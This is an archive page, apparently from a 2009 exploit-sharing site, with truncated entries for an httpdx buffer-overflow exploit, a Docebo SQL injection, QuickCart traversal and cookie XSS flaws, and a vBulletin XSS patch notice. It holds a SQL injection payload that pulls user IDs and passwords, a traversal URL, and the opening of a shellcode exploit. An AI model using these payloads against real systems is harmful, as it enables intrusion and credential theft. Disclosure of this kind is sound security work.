Home » 2009 » October » 13
Remote buffer overflow in httpdx
httpdx web server 1.4 is vulnerable to a remote buffer overflow using long GET requests such as http://www.example.com/aaa=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
The vulnerability lies in httpdx_src/http.cpp in h_handlepeer() : strcpy(index,client->filereq);

Other versions may also be vulnerable.

Exploit (0day) (Tested with httpdx 1.4 on WinXP SP3)


#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

/* 128 byte portbinding shellcode (for WinXP SP3) port 58821
  Derived from shellcode written by silicon */ ... Read more »
Views: 1462 | Added by: apeh1706 | Date: 13 October 2009 | Comments (1)

Docebo Multiple SQL-Injection Vulnerabilities
******************************
********************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************

########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

-> http://localhost/docebo/ ... Read more »
Views: 8636 | Added by: apeh1706 | Date: 13 October 2009 | Comments (0)

QuickCart Multiple vlunerabilities
DISCOVERED: Paweł 'kl3ryk' Łaskarzewski
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan

DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN
THIS FILE]-
Most of actions load templates form bad directory and then throw an exception.

example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
1) in login form in admin.php
You need to change cookie "sLogin" and there put your XSS code. After
that when you will go to http://revival.pl/test/quickcart/admin.php
you will see your XSS executed.

####templates/admin/loign.tpl
<form method="post" action="$sLoginPage" name="form">
 <fieldset>< ... Read more »
Views: 1196 | Added by: apeh1706 | Date: 13 October 2009 | Comments (0)

vBulletin - Cross Site Script Redirection
vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Rese ... Read more »
Views: 29850 | Added by: apeh1706 | Date: 13 October 2009 | Comments (229)

close